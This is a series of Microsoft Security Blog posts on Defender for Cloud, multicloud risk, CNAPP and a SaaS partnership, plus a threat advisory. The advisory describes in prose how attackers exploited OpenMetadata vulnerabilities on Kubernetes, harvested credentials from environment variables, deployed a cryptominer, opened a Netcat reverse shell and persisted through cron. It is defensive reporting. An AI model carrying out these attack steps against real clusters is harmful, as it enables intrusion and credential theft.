Microsoft Defender for Cloud, the integrated CNAPP from Microsoft, delivers comprehensive security and compliance from code to runtime, enhanced by generative AI and threat intelligence to help you secure your hybrid and multicloud environments. With Defender for Cloud, organizations can support secure development, minimize risks with contextual posture management, and protect workloads and applications from modern threats in a unified security operations (SecOps) experience.  

Defender for Cloud not only transcends traditional security silos and extends its end-to-end security across multicloud and hybrid infrastructure, it delivers advanced security posture management and threat remediation capabilities as well. In order to prove the solution’s business benefits, Microsoft commissioned Forrester Consulting to conduct a Total Economic Impact™ (TEI) study. The study aims to provide business leaders and decision-makers with a solid framework with which they can evaluate the benefits and potential financial impact of Defender for Cloud on their organizations.

Through the course of the study, participating interviewees reported experiencing a wide variety of benefits related to Defender for Cloud, including reduced operational risk, a compressed, more secure development lifecycle, and reduced time to investigate and remediate threats faster.

All told, the study found that the benefits of Defender for Cloud add up to a significant net present value (NPV) of $4.25 million over three years. But that’s not the whole story. Here are some other key takeaways mentioned by Forrester’s interviewees.

1. Shorter threat investigation and remediation times

“[Defender for Cloud] just takes out the weird stuff happening on our network that ends up on the cybersecurity desk. We’ve already probably cut back about 60% of the workload, and a lot of that revolves around false positives, so I can get better data. The systems assess the data properly…I’m not even going to give it to the analyst. I’m going to auto-close.”

—Chief technology officer, Life Sciences

Defender for Cloud was found to register 50% fewer false positives than legacy security solutions. Simultaneously, the solution reduced the investigation and remediation times of legitimate threats by 30%. Due to these dramatic improvements, study participants avoided 36,000 investigation and remediation hours on average. By reallocating the corresponding $796,000 of SecOps labor to proactive threat hunting and other high-value activities, companies were able to further improve their security performance.

2. Improved security operations center (SOC) productivity

“[With Defender for Cloud], if the tools are configured properly, the [global] efficiencies in your SOC can probably be up to 30% for a fine-tuned environment.”

—Technical manager, Business-to-business Software

By broadening the number and types of workloads protected by Defender for Cloud, participating businesses saw an average 30% improvement in SecOps productivity. This boost was a combination of consolidating duplicative multicloud security policies, replacing patching processes and other similar time-consuming procedures with automation, and embracing the efficiency gains of a better-integrated Microsoft ecosystem. In financial terms, these productivity gains translate to a $5.6 million savings over three years.

3. Lower total cost of ownership

“[Without Defender for Cloud], it would be so much more complex. It would cost us double to maintain [our multicloud security stack].”

—Cyberdefense leader, Materials

Interviewees reported that Defender for Cloud reduced their licensing costs by 10% when compared to legacy security solutions. This savings is the result of eliminating the licensing and management costs associated with five legacy security solutions over three years—made possible because of the breadth of workloads protected by Defender for Cloud. Interviewees also reported 1,700-hour reduction in security stack administrative work thanks to their ability to consolidate workloads across their multicloud infrastructures. These adjustments together yielded more than $1 million in cost savings.

4. More comprehensive cyberthreat coverage and prioritization

“Microsoft is capturing 10% of real incidents [not caught by other solutions deployed], reducing our attack surface by 10%.“

—Chief information security officer (CISO), Technology

Defender for Cloud caught 10% more legitimate cyberthreats than the prior security environments study participants had been using, on average. Each of these threats required a response and would have been missed. Interviewees defined the incidents they had previously lacked the capacity to address a mix of increasingly complex and overlapping cyberthreats that included but were not limited to runtime container risk, overprovisioning container privileges, malware, phishing and social engineering efforts, and shadow IT. Not only did Defender for Cloud identify these incidents, it provided greater context surrounding them, improving threat prioritization and avoiding $292,000 in costs related to data breaches.

5. Lower compliance costs

“[Defender for Cloud] is capable of saving up to 5% of [my organization’s] engineering overhead around [audit and compliance] meetings and collaboration.”  

—CISO, Technology

With Defender for Cloud, participating organizations decreased their compliance-related costs. Auditing fees were avoided and compliance-related meeting schedules were streamlined, reducing reliance on outside auditing services. Over three years, the average savings related to these process improvements was $857,000, a 15% reduction in audit compliance overhead.

The advantages of Microsoft Defender for Cloud

Overall, the Forrester study found that Defender for Cloud markedly enhanced the security, compliance, and operational efficiency of each company participating in the TEI study. Through representative interviews and financial analysis, Forrester determined that a composite organization experiencing the aggregate benefits of the study’s participants received $8.52 million in financial benefits over three years. In balancing these benefits against $4.27 million in costs over the same period, Forrester determined that Defender for Cloud represents a net present value (NPV) of $4.25 million.

Interviewees participating in the study went beyond the financial benefits in their praise of Defender for Cloud. After adopting the solution, participants saw reduced risk and improvements to both their security and compliance postures at scale. Even as regulatory and compliance landscapes shifted beneath their feet, these organizations were better able to use the added context of Microsoft cloud security benchmarks to stay on solid ground—remaining compliant when others might not have.

Additionally, interviewees noted that Defender for Cloud helped them more securely collaborate with their technology partners and to establish more secure, more efficient software development pipelines. These benefits, interviewees emphasized, would have further benefits down the road as well, including reduced development times, improved time-to-value, and ultimately greater potential for business growth.

Learn more

To learn more about the business value of Microsoft Defender for Cloud, explore the Total Economic Impact™ Of Microsoft Defender for Cloud study for further analysis and findings, as well as the perspectives of Defender for Cloud users interviewed in the study. Also, register for the webinar featuring Forrester on top cloud security trends, key considerations, and quantifying the business value of CNAPP.

Learn more about Microsoft Cloud Security Solutions.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Microsoft Defender for Cloud remediated threats 30% faster than other solutions, according to Forrester TEI study appeared first on Microsoft Security Blog.

Securing multicloud environments is a deeply nuanced task, and many organizations struggle to fully safeguard the many different ways cyberthreat actors can compromise their environment. In our latest report, “2024 State of Multicloud Security Risk,” we analyzed usage patterns across Microsoft Defender for Cloud, Microsoft Security Exposure Management, Microsoft Entra Permissions Management, and Microsoft Purview to identify the top multicloud security risks across Microsoft Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and beyond. This is the first time Microsoft has released a report sharing key insights across aspects of cloud security, including identity and data. 

This multidimensional analysis is key because it provides deeper visibility into all of the angles cyberattackers can use to breach cloud environments. For example, we found that more than 50% of cloud identities had access to all permissions and resources in 2023. Can you imagine what would happen if even one of these “super identities” were compromised? Looking beyond identity and access, we also discovered significant vulnerabilities in development and runtime environments and within organizations’ data security postures. These threats and more are the driving forces behind Microsoft’s work to advance cybersecurity protections by sharing the latest security intelligence and through programs like the recently expanded Secure Future Initiative, which works to guide Microsoft advancements according to secure by design, secure by default, and secure operations principles.

Read on for our topline insights from the report.

2024 State of Multicloud Security

The new report shares trends and insights to drive an integrated multicloud security strategy.

Read the report

1. Multicloud security demands a proactive, prioritized approach  

Any practitioner who has worked in cloud security can tell you just how challenging it is to analyze, prioritize, and address the hundreds of security alerts they receive every day. Security teams are also responsible for managing all exposed assets and other potential risk vectors. The average multicloud estate has 351 exploitable attack paths that lead to high-value assets, and we discovered more than 6.3 million exposed critical assets among all organizations.  

Cloud security posture management (CSPM) is one solution, but rather than taking a siloed approach, we recommend driving deeper, more contextualized CSPM as part of a cloud-native application protection platform (CNAPP).  

CNAPPs are unified platforms that simplify securing cloud-native applications and infrastructure throughout their lifecycle. Because CNAPPs can unify CSPM with things like multipipeline DevOps security, cloud workload protections, cloud infrastructure entitlement management (CIEM), and cloud service network security (CSNS), they can correlate alerts and eliminate visibility gaps between otherwise disparate tools. This allows security teams to proactively identify, prioritize, and mitigate potential cyberattack paths before they can be exploited. 

2. CNAPP embeds secure best practices throughout the entire application lifecycle

Properly securing cloud-native applications and infrastructure from initial code development to provisioning and runtime is a significant challenge area for many organizations. We found that 65% of code repositories contained source code vulnerabilities in 2023, which remained in the code for 58 days on average. Given that one quarter of high-risk vulnerabilities are exploited within 24 hours of being published, this creates a significant window for threat actors to take advantage and compromise your environment.²

In addition to delivering proactive protection during runtime, CNAPP can act as a shared platform for security teams to work with developers to unify, strengthen, and manage multipipeline DevOps security. And because CNAPP unites multiple cloud security capabilities under a single umbrella, security teams can also enforce full-lifecycle protections from a centralized dashboard. This shifts security left and heads off development risks before they become a problem in runtime.  

3. Organizations need a unified security approach to secure cross-cloud workloads

Multicloud security goes deeper than attack path analysis and strong DevSecOps. Organizations also need to examine how the growing use and variety of cloud workloads impact their exposure to cyberthreats. When cloud workloads span across multiple cloud environments, that creates a more complex threat landscape with additional complexities and dependencies that require proper configuration and monitoring to secure.  

Microsoft’s CNAPP solution, Microsoft Defender for Cloud, has an extended detection and response (XDR) integration that provides richer context to investigations and allows security teams to get the complete picture of an attack across cloud-native resources, devices, and identities. Roughly 6.5% of Defender for Cloud alerts were connected to other domains—such as endpoints, identities, networks, and apps and services—indicating cyberattacks that stretched across multiple cloud products and platforms.  

Rather than using individual point solutions to manage cross-cloud workload threats, organizations need an easy way to centralize and contextualize findings across their various security approaches. A CNAPP delivers that unified visibility. 

4. Securing growing workload identities requires a more nuanced approach

Also central to multicloud security is the idea of identity and access management. In the cloud, security teams must monitor and secure workload identities in addition to user identities. These workload identities are assigned to software workloads, such as apps, microservices, and containers. The growing usage of workload identities creates several challenges. 

For starters, workload identities make up 83% of all cloud identities within Microsoft Entra Permissions Management. When examining the data, we found that 40% of these workload identities are inactive—meaning they have not logged in or used any permissions in at least 90 days. These inactive identities are not monitored the same way as active identities, making them an attractive target for cyberattackers to compromise and use to move laterally. Workload identities can also be manually embedded in code, making it harder to clean them without triggering unintended consequences.  

What’s concerning, though, is the fact that the average organization has three human super identities for every seven workload super identities. These workload super identities have access to all permissions and resources within the multicloud environment, making them an enormous risk vector that must be addressed. And because workload identities are growing significantly faster than human identities, we expect the gap between human and workload super identities to widen rapidly.  

Security teams can address this risk by establishing visibility into all existing super identities and enforcing least privilege access principles over any unused or unnecessary permissions—regardless of the cloud they access. 

5. CIEM drives visibility and control over unused permissions

Speaking of permissions, our report found that more than 51,000 permissions were granted to users and workloads (up from 40,000 in 2022). With more permissions come more access points for cyberattackers.  

A CIEM can be used to drive visibility across the multicloud estate, eliminating the need for standing access for super identities, inactive identities, and unused permissions. Just 2% of human and workload identity permissions were used in 2023, meaning the remaining 98% of unused permissions open organizations up to unnecessary risk.  

By using a CIEM to identify entitlements, organizations can revoke unnecessary permissions and only allow just-enough permissions, just in time. This approach will significantly mitigate potential risks and enhance the overall security posture.  

6. A multilayered data security approach eliminates complexity and limits blind spots

Finally, organizations need a comprehensive data security approach that can help them uncover risks to sensitive data and understand how their users interact with data. It’s also important to protect and prevent unauthorized data use throughout the lifecycle using protection controls like encryption and authentication. 

A siloed solution won’t work, as organizations with 16 or more point solutions experience 2.8 times as many data security incidents as those with fewer tools. Instead, organizations should deploy integrated solutions through a multilayered approach that allows them to combine user and data insights to drive more proactive data security. At Microsoft, we accomplish this through Microsoft Purview—a comprehensive data security, compliance, and governance solution that discovers hidden risks to data wherever it lives or travels, protects and prevents data loss, and investigates and responds to data security incidents. It can also be used to help improve risk and compliance postures and meet regulatory requirements. 

Uncover strategies for mitigating your biggest multicloud risks 

Ultimately, multicloud security has multiple considerations that security teams must account for. It is not a check-the-box endeavor. Rather, security teams must continuously enforce best practices from the earliest stages of development to runtime, identity and access management, and data security. Not only must these best practices be enforced throughout the full cloud lifecycle, but they must also be standardized across all cloud platforms.

In a recent episode of our podcast, Uncovering Hidden Risks, we sat down with Christian Koberg-Pineda, a Principal Security DevOps Engineer at S.A.C.I. Falabella, to dive into his journey toward uncovering the challenges and strategies for safeguarding cloud-native applications across various cloud platforms. In it, he talks about the complexity of securing multiple clouds, including navigating differing configurations, technical implementations, and identity federation.

“One of the most relevant characteristics of cloud computing is that you can scale things on demand. As cloud security expert, you must think in scale too. You need to implement a security tool that is also capable of scaling together with your infrastructure or your services.”

– Christian Koberg-Pineda, Principal Security DevOps Engineer at S.A.C.I. Falabella

For more information on creating a secure multicloud environment, download the full “2024 State of Multicloud Security Risk” report and check out the below resources.  

• Uncovering Hidden Risks Podcast Episode 18: Navigating Multicloud Security Risks, A Customer Story.
• 2024 State of Multicloud Security Risk Report Infographic.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

¹SANS 2023 Multicloud Survey: Navigating the Complexities of Multiple Cloud,  SANS Institute. 

²1 in 4 high-risk CVEs are exploited within 24 hours of going public, SC Media.

The post 6 insights from Microsoft’s 2024 state of multicloud risk report to evolve your security strategy appeared first on Microsoft Security Blog.

CNAPP combines several cybersecurity capabilities—cloud security posture management (CSPM), cloud infrastructure entitlement management (CIEM), and cloud workload protection (CWP), among others—into one platform. This platform protects your organization through every operation, from concept development to runtime use. And it’s tailored to applications native to a multicloud environment. As a result, you can both ensure management access and strengthen app-related defenses against potential vulnerabilities in multicloud setups.

Choosing CNAPP as your solution can help chief information security officers (CISOs) build impact.¹ When weighing the value of CNAPP, consider these numbers:

• 40% of organizations used a CNAPP in 2023 and an additional 45% expect to use one by the end of 2024.²
• 87% of organizations embrace multicloud.³
• 82% of breaches involved data stored in the cloud.⁴
• $4.45 million is the average cost of a data breach.⁵
• 54% of organizations do not include security in the development phase.⁶

Read on for five of the biggest insights found in the guide and download “From plan to deployment: implementing a cloud-native application protection platform (CNAPP) strategy” to dive deeper into this important subject. Use it as a valuable resource to guide your CNAPP planning.

Implementing a CNAPP strategy

Learn how a cloud-native application protection platform can strengthen your organization's security strategy.

Get the guide

Insight #1: AI can tighten security and deliver insights

AI and machine learning play key roles in threat mitigation and security operations for cloud security. In fact, they could even be considered the backbone of these strategies because they give you the ability to analyze and respond to threats in real-time. Seconds matter in cybersecurity and could be the difference between minimal and major damage from a cyberattack.

AI and machine learning can also provide an assist by increasing predictive analysis and automating security tasks, helping your employees prioritize strategic security tasks. Manually managing today’s complex cloud infrastructures simply isn’t possible. The key is to include human oversight with human-in-the-loop monitoring of the technologies.

Insight #2: CNAPP can address challenges like alert overload and more

CNAPP holds day-to-day ease for security teams and strategic value for decision-makers. And there’s an urgent need for an end-to-end platform for cloud security—even better if powered by AI and machine learning. CNAPP helps you address some of the biggest challenges in cloud security, including:

• Building security into software during development: Security as code, which involves building security into software during development, will keep gaining momentum. CNAPP benefits the development process in several ways, including ensuring security is part of application development and forging collaboration between the developers and security teams.  
• Improving multicloud security posture: With CNAPP solutions, you can get an aggregation and analysis of data from multiple cloud platforms and services in a unified dashboard. These centralized insights can help security teams prioritize tasks more easily. Expanding multicloud visibility and enhancing multiplatform protection are two advantages of recent Microsoft Security innovations.
• Decreasing costs and tackling advanced cyberthreats: Security operations center (SOC) analysts and security admins could be easily overwhelmed by the modern digital threat landscape and frustrated by the number of signals. The predictive analytics of CNAPP solutions can make it easier for them to identify and mitigate potential risks while automating security responses to threats.

Insight #3: Effective cybersecurity takes a good partner  

Keeping user needs in mind, Microsoft has its own CNAPP solution—Microsoft Defender for Cloud. This comprehensive security solution has robust security features to safeguard a wide array of resources, including servers, containers, databases, applications, and, crucially, data storage solutions like Microsoft Azure Storage, across various cloud platforms. Implementing Microsoft Defender for Cloud can protect against current threats and position your organization to confidently address emerging security threats in the cloud.

Cybersecurity is a dual effort between cloud service providers and users. Microsoft Defender for Cloud models this collaborative approach with a more integrated and proactive strategy than is common with traditional security. Among other attributes, it aligns with DevOps, features rapid deployment capabilities, and offers two levels of CSPM functionality—foundational and premium from an offering called Microsoft Defender Cloud Security Posture Management. Deploying CSPM services should be a part of your CNAPP strategy.

It also integrates with other cybersecurity solutions. But given the way Microsoft embraces innovation, it’s probably no surprise that we’ll continue to evolve this solution to keep pace with fluid technological advancement. So, as usual, watch this space for exciting announcements to come.

Insight #4: Operationalizing CNAPP is a multipronged approach

With any solution, the benefits can’t be realized if your users aren’t adopting it. Operationalizing Microsoft Defender for Cloud takes both integrating it into daily operations and satisfying your users’ needs by continuously evolving cloud security. You want your users to manage it and use the platform’s capabilities. This includes its functionalities across Microsoft Azure, Amazon Web Services, and Google Cloud Platform.

Other factors of operationalizing CNAPP include:

• Monitoring continuously, evaluating risk, and assessing status.
• Managing identity entitlement.
• Training employees to use security tools.
• Setting processes in place that can mitigate and remediate unhealthy resources.
• Fostering a culture of security awareness.

Insight #5: CNAPP is a critical part of a modern SOC

The SOC is critical and you strive for it to be efficient and effective. The insights from a CNAPP like Microsoft Defender for Cloud can dramatically transform SOC operations due to its total visibility, real-time monitoring, compliance and risk management tools, multiple integrations, and advanced analytics.

You can take a more proactive, strategic approach to cloud security with capabilities like:

• Detailed insights into threats and vulnerabilities, including their possible severity and impact.
• Automated compliance assessments based on industry standards.
• Post-incident analysis support through incident information.

Strengthening the SOC even further is a new Microsoft Defender for Cloud integration with Microsoft Defender XDR. You gain access to Defender for Cloud alerts and incidents within the Microsoft Defender portal for richer investigation context.

These highlights are just the beginning of what you can accomplish with CNAPP.

Explore the future of CNAPP and cloud security

Building a secure-first organization is critical to counter the continual stream of cyberthreats and the increasingly sophisticated nature of them. The future holds significant promise for CNAPP, and Microsoft is leading in this effort with solutions like Microsoft Defender for Cloud. Get details on CNAPP use case scenarios and Defender for Cloud’s integrations with other Microsoft products—and strategies for adopting and operationalizing it—in our guide “From plan to deployment: implementing a cloud-native application protection platform (CNAPP) strategy.” Or, watch our podcast for an expert discussion on how CNAPP helps you address modern challenges. Learn more about how Defender for Cloud can help you protect your multicloud resources, workloads, and apps.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

¹Want to build impact as a CISO? Choose CNAPP as your solution, CSO. May 26, 2024. 

²The future of cloud security: Top trends to watch in 2024, InfoWorld. March 14, 2024. 

³2023 State of the Cloud Report, Flexera.

⁴Microsoft Enterprise DevOps Report. 

⁵Cost of a Data Breach Report, IBM. 2023. 

⁶Microsoft Cloud Security Priorities and Practices Research. 

The post 5 ways a CNAPP can strengthen your multicloud security environment appeared first on Microsoft Security Blog.

OpenMetadata is an open-source platform designed to manage metadata across various data sources. It serves as a central repository for metadata lineage, allowing users to discover, understand, and govern their data. On March 15, 2024, several vulnerabilities in OpenMetadata platform were published. These vulnerabilities (CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254), affecting versions prior to 1.3.1, could be exploited by attackers to bypass authentication and achieve remote code execution. Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments.

Microsoft highly recommends customers to check clusters that run OpenMetadata workload and make sure that the image is up to date (version 1.3.1 or later). In this blog, we share our analysis of the attack, provide guidance for identifying vulnerable clusters and using Microsoft security solutions like Microsoft Defender for Cloud to detect malicious activity, and share indicators of compromise that defenders can use for hunting and investigation.

Attack flow

For initial access, the attackers likely identify and target Kubernetes workloads of OpenMetadata exposed to the internet. Once they identify a vulnerable version of the application, the attackers exploit the mentioned vulnerabilities to gain code execution on the container running the vulnerable OpenMetadata image.

After establishing a foothold, the attackers attempt to validate their successful intrusion and assess their level of control over the compromised system. This reconnaissance step often involves contacting a publicly available service. In this specific attack, the attackers send ping requests to domains that end with oast[.]me and oast[.]pro, which are associated with Interactsh, an open-source tool for detecting out-of-band interactions.

OAST domains are publicly resolvable yet unique, allowing attackers to determine network connectivity from the compromised system to attacker infrastructure without generating suspicious outbound traffic that might trigger security alerts. This technique is particularly useful for attackers to confirm successful exploitation and validate their connectivity with the victim, before establishing a command-and-control (C2) channel and deploying malicious payloads.

After gaining initial access, the attackers run a series of reconnaissance commands to gather information about the victim environment. The attackers query information on the network and hardware configuration, OS version, active users, etc.

As part of the reconnaissance phase, the attackers read the environment variables of the workload. In the case of OpenMetadata, those variables might contain connection strings and credentials for various services used for OpenMetadata operation, which could lead to lateral movement to additional resources.

Once the attackers confirm their access and validate connectivity, they proceed to download the payload, a cryptomining-related malware, from a remote server. We observed the attackers using a remote server located in China. The attacker’s server hosts additional cryptomining-related malware that are stored, for both Linux and Windows OS.

The downloaded file’s permissions are then elevated to grant execution privileges. The attacker also added a personal note to the victims:

Next, the attackers run the downloaded cryptomining-related malware, and then remove the initial payloads from the workload. Lastly, for hands-on-keyboard activity, the attackers initiate a reverse shell connection to their remote server using Netcat tool, allowing them to remotely access the container and gain better control over the system. Additionally, for persistence, the attackers use cronjobs for task scheduling, enabling the execution of the malicious code at predetermined intervals.

How to check if your cluster is vulnerable

Administrators who run OpenMetadata workload in their cluster need to make sure that the image is up to date. If OpenMetadata should be exposed to the internet, make sure you use strong authentication and avoid using the default credentials.

To get a list of all the images running in the cluster:

kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.spec.containers[*].image}{"\n"}{end}' | grep 'openmetadata'

If there is a pod with a vulnerable image, make sure to update the image version for the latest version.

How Microsoft Defender for Cloud capabilities can help

This attack serves as a valuable reminder of why it’s crucial to stay compliant and run fully patched workloads in containerized environments. It also highlights the importance of a comprehensive security solution, as it can help detect malicious activity in the cluster when a new vulnerability is used in the attack. In this specific case, the attackers’ actions triggered Microsoft Defender for Containers alerts, identifying the malicious activity in the container. In the example below, Microsoft Defender for Containers alerted on an attempt to initiate a reverse shell from a container in a Kubernetes cluster, as happened in this attack:

To prevent such attacks, Microsoft Defender for Containers provides agentless vulnerability assessment for Azure, AWS, and GCP, allowing you to identify vulnerable images in the environment, before the attack occurs.  Microsoft Defender Cloud Security Posture Management (CSPM) can help to prioritize the security issues according to their risk. For example, Microsoft Defender CSPM highlights vulnerable workloads exposed to the internet, allowing organizations to quickly remediate crucial threats.

Organizations can also monitor Kubernetes clusters using Microsoft Sentinel via Azure Kubernetes Service (AKS) solution for Sentinel, which enables detailed audit trail for user and system actions to identify malicious activity.

Indicators of compromise (IoCs)

Hagai Ran Kestenberg, Security Researcher
Yossi Weizman, Senior Security Research Manager

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters appeared first on Microsoft Security Blog.

Software as a service (SaaS) adoption has accelerated at a lightning speed, enabling collaboration, automation, and innovation for businesses large and small across every industry vertical—from government, education, financial service to tech companies. Every SaaS application is now expanding its offering to allow better integration with the enterprise ecosystem and advanced collaboration features, becoming more of a “platform” than an “application.” To further complicate the security landscape, business users are managing these SaaS applications with little to no security oversight, creating a decentralized administration model. All this is leading to a growing risk surface with complex misconfigurations that can expose organization’s identities, sensitive data, and business processes to malicious actors. 

To combat this challenge, Valence and Microsoft Security work together to ensure that SaaS applications are configured according to the best security practices and improve the security posture of identities configured in each individual SaaS application. Together, Valence and Microsoft:  

• Centrally manage SaaS identities permissions and access.
• Enforce strong authentication by ensuring proper MFA (multi-factor authentication) and SSO (single sign-on) enrollment and managing local SaaS users.
• Detect and revoke unauthorized non-human SaaS identities such as APIs, service accounts, and tokens.
• Incorporate SaaS threat detection capabilities to improve SaaS incident response.

As most of the sensitive corporate data shifted from on-prem devices to the cloud, security teams need to ensure they manage the risks of how this data is being accessed and managed. Integrating Valence’s SaaS Security with the Microsoft Security ecosystem now provides a winning solution. 

SaaS applications are prime targets  

Recent high profile breaches have shown that attackers are targeting SaaS applications and are leveraging misconfigurations and human errors to gain high privilege access to sensitive applications and data. While many organizations have implemented SSO and MFA as their main line of defense when it comes to SaaS, recent major breaches have proven otherwise. Attackers have identified that MFA fatigue, social engineering and targeting the SaaS providers themselves can bypass many of the existing mechanisms that security teams have put in place. These add to high-profile breaches where attackers leveraged legitimate third-party open authorization (OAuth) tokens to gain unauthorized access to SaaS applications, and many more attack examples. 

State of SaaS security risks 

According to our 2023 SaaS Security Report which analyzed real SaaS environments to measure their security posture before they implemented an effective SaaS security program. The results showed that every organization didn’t enforce MFA on 100% of their identities—there are some exceptions, such as service accounts, contractors, and shared accounts, or simply lack of effective monitoring of drift. In addition, one out of eight SaaS accounts are dormant and not actively used. Offboarding users is not only important to save costs, but attackers also like to target these accounts for account takeover attacks since they are typically less monitored. Other key stats were that 90% of externally shared files haven’t been used by external collaborators for at least 90 days and that every organization has granted multiple third-party vendors organization-wide access to their emails, files, and calendars. 

Figure 1. Top SaaS Security gaps identified in the 2023 State of SaaS Security Report.

Holistic SaaS security strategy 

Establishing a holistic SaaS security strategy requires to bring together many elements—from shadow SaaS discovery, through strong authentication, identity management of both humans and non-humans, managing and remediating SaaS misconfigurations, enforcing data leakage prevention policies, and finally, establishing scalable incident response. Valence and Microsoft take security teams one step further toward a more holistic approach. 

Valence joined the Microsoft Intelligence Security Association (MISA) and integrated with Microsoft security products—Microsoft Entra ID and ​​​​Microsoft Sentinel—to enhance customers’ capabilities to manage their SaaS risks, effectively remediate them, and respond to SaaS breaches. The Valence SaaS Security Platform provides insight and context on SaaS risks such as misconfigurations, identities, data shares, and SaaS-to-SaaS integrations. Extending existing controls with SaaS Security Posture Management (SSPM) capabilities and SaaS risk remediation capabilities. Valence is also a proud participant of the Partner Private Preview of Microsoft Copilot for Security. This involves working with Microsoft product teams to help shape Copilot for Security product development in several ways, including validation and refinement of new and upcoming scenarios, providing feedback on product development and operations to be incorporated into future product releases, and validation and feedback of APIs to assist with Copilot for Security’s extensibility. 

Figure 2. Illustrative data: The Valence Platform provides a single pane of glass to find and fix SaaS risk across four core use cases: data protection, SaaS to SaaS governance, identity security, and configuration management. 

Secure SaaS human and non-human identities

In the modern identity-first environment, most attackers focus on targeting high privilege users, dormant accounts, and other risks. Enforcing zero trust access has become a core strategy for many security teams. Security teams need to identify all the identities they need to secure. Microsoft Entra SSO management combined with Valence’s SaaS application monitoring—to detect accounts created—provides a holistic view into human identities and non-human (Enterprise Applications, service accounts, APIs, OAuth and 3rd party apps).  

Microsoft Entra ID centrally enforces strong authentication such as MFA and Valence discovers enforcement gaps or users that are not managed by the central SSO. Valence also monitors the SaaS applications themselves to discover the privileges granted to each identity and provides recommendations on how to enforce least privilege with minimal administrative access. To continuously validate verification based on risks, the final piece of zero trust strategy, Valence leverages the risky users and service principals signals from Microsoft Entra ID and combines them with signals from other SaaS applications for a holistic view into identity risks. 

Protect SaaS applications 

Microsoft has a wide SaaS offering that is fueling enterprise innovation. These services are central to core business functions and employee collaboration, cover many use cases, and are spread across multiple business units, but are tied together in many cases such as identity and access management, and therefore their security posture is often related as well. Managing the security posture of SaaS services can be complex because of the multiple configurations and the potential cross service effects that require security teams to build their expertise across a wide range of SaaS.  

Many security teams view SaaS apps as part of their more holistic view into SaaS security posture management and would like to create cross-SaaS security policies and enforce them. Valence’s platform integrates with Microsoft Entra ID and other SaaS services using Microsoft via Microsoft Graph to normalize the complex data sets and enable security teams to closely monitor the security posture of their SaaS applications in Microsoft alongside the rest of their SaaS environment. 

Enhance SaaS threat detection and incident response 

Improving SaaS security posture proactively reduces the chances of a breach, but unfortunately SaaS breaches can still occur, and organizations need to prepare their threat detection coverage and incident response plans. The built in human and non-human identity threat detection capabilities of Microsoft Entra ID, combined with Microsoft Sentinel log correlation and security automation, and Microsoft Copilot for Security’s advanced AI capabilities, create a powerful combination to detect and respond to threats. Valence expands existing detections from compromised endpoint and identity with important SaaS context—for example, did the compromise device belong to a SaaS admin user? Did the compromised identity perform suspicious activities in other SaaS applications? The expanded detections provide critical insights to prioritize and assess the blast radius of breaches. Additionally, Valence’s SaaS threat detection can trigger threat detection workflows in Microsoft products based on its unique indicator of compromise monitoring. 

Together, Valence and Microsoft combine the best of all worlds when it comes to SaaS security. From SaaS discovery, through SaaS security posture management, remediating risks, and detecting threats—Valence and Microsoft enable secure adoption of SaaS applications. Modern SaaS risks and security challenges require a holistic view into SaaS risk management and remediation. Get started today. 

About Valence Security 

Valence is a leading SaaS security company that combines SSPM and advanced remediation with business user collaboration to find and fix SaaS security risks. SaaS applications are becoming decentrally managed and more complex, which is introducing misconfiguration, identity, data, and SaaS-to-SaaS integration risks. The Valence SaaS Security Platform provides visibility and remediation capabilities for business-critical SaaS applications. With Valence, security teams can empower their business to securely adopt SaaS. Valence is backed by leading cybersecurity investors like Microsoft’s M12 and YL Ventures, and is trusted by leading organizations. Valence is available for purchase through Azure Marketplace. For more information, visit their website. 

Be among the first to hear about new products, capabilities, and offerings at Microsoft Secure digital event on March 13, 2024.​ Learn from industry luminaries and influencers. Register today.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products. 

​​To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity. 

The post ​​Secure SaaS applications with Valence Security and Microsoft Security​​ appeared first on Microsoft Security Blog.

Along with every merger and acquisition between two companies comes the need to combine and strengthen their IT infrastructure. In particular, there is an immediate and profound impact on the identity and access management (IAM) postures of both companies. With a newly combined workforce, where does all the user information live? Where are the authentications going to be handled? What changes are going to be made for authorization to applications; will users have access to the apps of the other organization? All these problems must be solved quickly in order to provide continuous day-to-day operations in a secure way.

While most combined organizations aspire to eventually consolidate their identity systems, this is a challenging and time-consuming process. The untangling (and re-entangling) of dozens or hundreds of enterprise applications and their identity stacks takes time and deliberation. Meanwhile, there may be immense pressure from users and app owners for secure access to the appropriate apps, along with pressure from regulators and investors to unlock and demonstrate value from the combined organization. Not to mention the pressure from investors and the board to deliver immediate value after the transaction’s close.

As one of the most comprehensive and advanced IAM platforms available today, Microsoft Entra ID is often the choice to be the dominant set of identity services in the combined architecture. Microsoft strives to make the merger and acquisition process as easy as possible and works with Strata Identity for a seamless integration. Strata’s Maverics Identity Orchestration platform does this by acting as abstraction layer to accelerate and simplify the path to consolidation.

The identity challenges with mergers and acquisitions

